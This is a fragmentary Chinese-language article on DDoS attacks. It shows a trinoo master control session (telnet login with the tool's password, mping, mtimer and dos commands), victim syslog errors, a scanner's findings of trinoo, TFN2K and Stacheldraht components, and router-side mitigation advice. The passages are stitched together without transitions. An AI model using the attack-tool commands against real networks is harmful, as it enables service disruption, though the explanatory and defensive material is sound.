进入2000年以来,网络遭受攻击事件不断发生,全球许多著名网站如yahoo、cnn、buy、ebay、fbi,包括中国的新浪网相继遭到不名身份的黑客攻击,值得注意的是,在这些攻击行为中,黑客摈弃了以往常常采用的更改主页这一对网站实际破坏性有限的做法,取而代之的是,在一定时间内,彻底使被攻击的网络丧失正常服务功能,这种攻击手法为 DDoS,即分布式拒绝服务攻击(Distributed denial of service )。
telnet 27665 Escape character is '^]'. betaalmostdone (输入密码) trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] trinoo> (进入提示符) trinoo> mping (我们首先来监测一下各个攻击守护进程是否成功启动) mping: Sending a PING to every Bcasts. trinoo> PONG 1 Received from PONG 2 Received from PONG 3 Received from (成功响应) trinoo> mtimer 60 (设定攻击时间为60秒) mtimer: Setting timer on bcast to 60. trinoo> dos DoS: Packeting
Mar 20 14:40:34 victim snmpXdmid: Will attempt to re-establish connection. Mar 20 14:40:35 victim snmpdx: error while receiving a pdu from The message has a wrong header type (0x0) Mar 20 14:40:35 victim snmpdx: error while receiving a pdu from The message has a wrong header type (0x0) Mar 20 14:40:36 victim snmpdx: error while receiving a pdu from The message has a wrong header type (0x0) Mar 20 14:40:36 victim snmpXdmid: Error receiving PDU The message has a wrong header type (0x0). Mar 20 14:40:36 victim snmpXdmid: Error receiving packet from agent; rc = -1. Mar 20 14:40:36 victim snmpXdmid: Will attempt to re-establish connection. Mar 20 14:40:36 victim snmpXdmid: Error receiving PDU The message has a wrong header type (0x0). Mar 20 14:40:36 victim snmpXdmid: Error receiving packet from agent; rc = -1.
Logging output to: LOG Scanning running processes... /proc/795/object/a.out: trinoo daemon /usr/bin/gcore: core.795 dumped /proc/800/object/a.out: trinoo master /usr/bin/gcore: core.800 dumped Scanning "/tmp"... Scanning "/"... /yiming/tfn2k/td: tfn2k daemon /yiming/tfn2k/tfn: tfn2k client /yiming/trinoo/daemon/ns: trinoo daemon /yiming/trinoo/master/master: trinoo master /yiming/trinoo/master/...: possible IP list file NOTE: This message is based on the filename being suspicious, and is not based on an analysis of the file contents. It is up to you to examine the file and decide whether it is actually an IP list file related to a DDOS tool. /yiming/stacheldrahtV4/leaf/td: stacheldraht daemon /yiming/stacheldrahtV4/telnetc/client: stacheldraht client /yiming/stacheldrahtV4/td: stacheldraht daemon /yiming/stacheldrahtV4/client: stacheldraht client /yiming/stacheldrahtV4/mserv: stacheldraht master
ALERT: One or more DDOS tools were found on your system. Please examine LOG and take appropriate action.
第三,在路由器连接骨干网络的端口结合采用CEF和ip verify unicast reverse-path,挡住一部分ip spoof,syn的攻击。同时使用access control lists将可能被使用的网络保留地址封掉。借助使用CAR技术来限制 ICMP 报文大小。具体使用可查阅cisco网站。